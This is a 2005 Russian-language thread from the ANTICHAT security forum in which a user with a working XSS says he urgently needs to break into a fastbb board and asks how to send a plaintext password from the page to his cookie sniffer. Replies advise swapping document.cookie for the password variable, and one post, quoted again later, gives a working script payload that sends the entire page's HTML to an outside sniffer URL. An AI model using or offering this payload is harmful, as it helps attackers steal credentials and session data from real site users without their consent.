HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Что можно передать кроме кук на сниффер?
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

Что можно передать кроме кук на сниффер?
  #1  
Старый 09.11.2005, 14:45
*Van*
Постоянный
Регистрация: 14.08.2005
Сообщений: 378
Провел на форуме:
670862

Репутация: 54
По умолчанию Что можно передать кроме кук на сниффер?
Есть рабочая xss. Такой вопрос: можно ли передать на сниффер фрагмент самой страницы, её html-кода?
 
Ответить с цитированием

  #2  
Старый 09.11.2005, 15:23
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463

Репутация: 2258


По умолчанию
или я тебя не понял или ты сам не знаешь чего написал=))))
передаются Referer, Query [куки], Agent и все..
__________________
Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
 
Ответить с цитированием

  #3  
Старый 09.11.2005, 16:05
*Van*
Постоянный
Регистрация: 14.08.2005
Сообщений: 378
Провел на форуме:
670862

Репутация: 54
По умолчанию
Лан, я просто плохо объяснил....извините...короч проблема вот в чём...
нужно взломать fastbb, позарез. Такая параша, но очень необходимо.
Короче куки на сниффер приходят, но они ужасной кодировки...не подставляются, то ли привязка там к чему-то стоит. Не знаю, если не получится то что я придумал, тогда буду пробовать дальше. А придумал я то что там пароль на странице хранится в открытом виде(в html виде => var pass). И я подумал нельзя ли пересылать его снифферу? Вот решил спросить у вас...
 
Ответить с цитированием

  #4  
Старый 09.11.2005, 16:14
qBiN
Постоянный
Регистрация: 20.01.2005
Сообщений: 899
Провел на форуме:
1535446

Репутация: 182


По умолчанию
Цитата:
передаются Referer, Query [куки], Agent и все..
А ты уверен??
Просто сниффер не логирует\показывает.
Например порт браузера,порт сервера ну и кучу другой не нужной информации,хотя кому-то может и нужной...
 
Ответить с цитированием

  #5  
Старый 09.11.2005, 16:17
qBiN
Постоянный
Регистрация: 20.01.2005
Сообщений: 899
Провел на форуме:
1535446

Репутация: 182


По умолчанию
Цитата:
И я подумал нельзя ли пересылать его снифферу?
Я в ждавескрипте ничерта не смыслю
Вместо document.cookie поставь название переменной...
зы не забываем про репутацию
 
Ответить с цитированием

  #6  
Старый 09.11.2005, 16:30
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463

Репутация: 2258


По умолчанию
qBiN, в данный момент речь идет об ачатовском снифферее,а соответственно он показывает только то что я перечислил... да и не будет же он показывать ХТМЛ код, это же глупо не так ли??
BaH, это уже другой разговор...помоему надо пхп скрипт подделать который будет принимать значения формы var_pass а в пхп я 0 =)
Чесно говоря уже задолбали Повышайте мне репутацию! после этой новой системы...
__________________
Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
Последний раз редактировалось m0nzt3r; 11.11.2005 в 00:59..
 
Ответить с цитированием

  #7  
Старый 10.11.2005, 20:36
*Van*
Постоянный
Регистрация: 14.08.2005
Сообщений: 378
Провел на форуме:
670862

Репутация: 54
По умолчанию
Всё разрешилось, темку можно закрывать.
 
Ответить с цитированием

  #8  
Старый 11.11.2005, 00:50
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916

Репутация: 0


По умолчанию
Цитата:
Сообщение от m0nzt3r  
qBiN, в данный момент речь идет об ачатовском снифферее,а соответственно он показывает только то что я перечислил... да и не будет же он показывать ХТМЛ код, это же глупо не так ли??
BaH, это уже другой разговор...помоему надо пхп скрипт подделать который будет принимать значения формы var_pass а в пхп я 0 =)
Сниффер может показывать все что угодно. Вернее все что вы на него передадите.
Например вот так можно переслать на сниффер всю HTML страницу:
Цитата:
<script>i=new Image(); i.src="http://antichat.ru/cgi-bin/s.jpg?"+document.documentElement.innerHTML;</script>
 
Ответить с цитированием

  #9  
Старый 11.11.2005, 15:25
bul666
Banned
Регистрация: 21.04.2005
Сообщений: 328
Провел на форуме:
632524

Репутация: 9
По умолчанию
Цитата:
Сообщение от m0nzt3r  
или я тебя не понял или ты сам не знаешь чего написал=))))
передаются Referer, Query [куки], Agent и все..
Мне кажется это ты не хнаешь что написал!!! )

Почему ты написал Query [куки]?!!!
 
Ответить с цитированием

  #10  
Старый 19.11.2005, 15:49
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553

Репутация: 1316


По умолчанию
Цитата:
<script>i=new Image(); i.src="http://antichat.ru/cgi-bin/s.jpg?"+document.documentElement.innerHTML;</script>
это я не понял, если кто-то прикольнеться так и напишет, то всю страницу лога сниффера, будет занимать чьята долбанная html страница? =))))
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
химия своими руками silveran Болталка 43 11.01.2006 22:05



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.